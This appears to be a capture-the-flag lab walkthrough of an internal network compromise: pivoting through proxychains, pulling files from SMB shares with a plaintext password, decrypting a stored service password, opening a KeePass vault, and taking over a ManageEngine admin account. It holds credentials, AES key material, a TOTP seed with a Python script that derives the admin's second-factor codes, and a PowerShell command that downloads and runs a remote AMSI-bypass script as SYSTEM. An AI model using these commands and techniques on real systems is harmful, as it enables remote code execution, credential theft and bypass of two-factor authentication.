From the network of 172.16.20.180, we saw shares accessible on this machine.

Authenticated Share Access

proxychains impacket-smbclient wendy.vincent:Summer2023@172.16.21.195

use install$
mget *

install$

use it
cd vault
mget svc.kdbx

it/vault/

use manageengine
mget config.xml

manageengine

use homes
cd Amy.ball
cat flag.txt.txt

homes/amy.ball

VL{3387261d92644002942061cfea267da2}

Decrypt the Secure pass file

  • Watch the video part 3.
  • 8623050922ab890bbd2f79886cd6809f (key)
  • 81274145f4a5857b839ee7b500f1d66e (IV)
  • 8a044d12211781b515e7bae67bb7abce (pass)

AES Decrypt

  • Password = jYEp9bq32KFLVL!
  • Username = svc_me

KeePass

  • We found a KDBX file of version 4.
  • We can try to use this password to open the database file.
  • otpauth://totp/manage%20engine%20admin%20totp:admin?secret=CXXDI3PTAWF52Z7L&period=30&digits=6&issuer=manage%20engine%20admin%20totp
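
The otpauth URI stored in the vault carries the full TOTP seed, so whoever opens the database can derive the admin account's second factor as well as read its password. The following is an added example, not part of the original notes: it parses that URI and computes the RFC 6238 code for a given time. The function names are this example's own.

```python
import base64, hashlib, hmac, struct
from urllib.parse import urlparse, parse_qs, unquote

# otpauth URI exactly as it appears in the KeePass entry above.
URI = ("otpauth://totp/manage%20engine%20admin%20totp:admin"
       "?secret=CXXDI3PTAWF52Z7L&period=30&digits=6"
       "&issuer=manage%20engine%20admin%20totp")

def parse_otpauth(uri):
    """Split an otpauth:// URI into the fields a TOTP generator needs."""
    u = urlparse(uri)
    if u.scheme != "otpauth" or u.netloc != "totp":
        raise ValueError("not a TOTP otpauth URI")
    q = {k: v[0] for k, v in parse_qs(u.query).items()}
    # Label is "issuer:account"; the issuer query parameter wins if present.
    label_issuer, _, account = unquote(u.path.lstrip("/")).rpartition(":")
    return {
        "issuer": q.get("issuer", label_issuer),
        "account": account,
        "secret": q["secret"],
        "period": int(q.get("period", 30)),
        "digits": int(q.get("digits", 6)),
        "algorithm": q.get("algorithm", "SHA1").lower(),
    }

def totp(secret_b32, at, period=30, digits=6, algorithm="sha1"):
    """RFC 6238 code for Unix time `at` (HOTP over the time-step counter)."""
    s = secret_b32.upper()
    key = base64.b32decode(s + "=" * (-len(s) % 8))  # re-pad if needed
    counter = struct.pack(">Q", int(at) // period)
    mac = hmac.new(key, counter, getattr(hashlib, algorithm)).digest()
    offset = mac[-1] & 0x0F                          # dynamic truncation
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)

def code_from_uri(uri, at):
    """Parse the URI and return the code valid at Unix time `at`."""
    p = parse_otpauth(uri)
    return totp(p["secret"], at, p["period"], p["digits"], p["algorithm"])

if __name__ == "__main__":
    import time
    fields = parse_otpauth(URI)
    print(fields["issuer"], fields["account"], code_from_uri(URI, time.time()))
```
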

ManageEngine login on port 8383 with the available info

User Currently Logged on : **carly.adams**

Actions and PowerShell

Run as system

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"

172.16.21.140

Run as carly.adams as well, just in case